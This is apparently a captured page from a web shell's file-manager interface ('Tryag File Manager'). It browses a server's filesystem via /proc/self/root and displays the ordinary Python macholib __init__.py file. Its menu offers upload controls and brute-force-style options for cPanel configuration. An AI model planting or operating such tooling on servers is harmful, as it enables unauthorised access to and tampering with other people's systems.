Tryag File Manager
Home
||
Turbo Force
||
B-F Config_Cpanel
Current Path :
/
proc
/
self
/
root
/
usr
/
lib64
/
python2.7
/
ctypes
/
macholib
/
Or
Select Your Path :
Upload File :
New :
File
Dir
//proc/self/root/usr/lib64/python2.7/ctypes/macholib/__init__.py
###################################################################### # This file should be kept compatible with Python 2.3, see PEP 291. # ###################################################################### """ Enough Mach-O to make your head spin. See the relevant header files in /usr/include/mach-o And also Apple's documentation. """ __version__ = '1.0'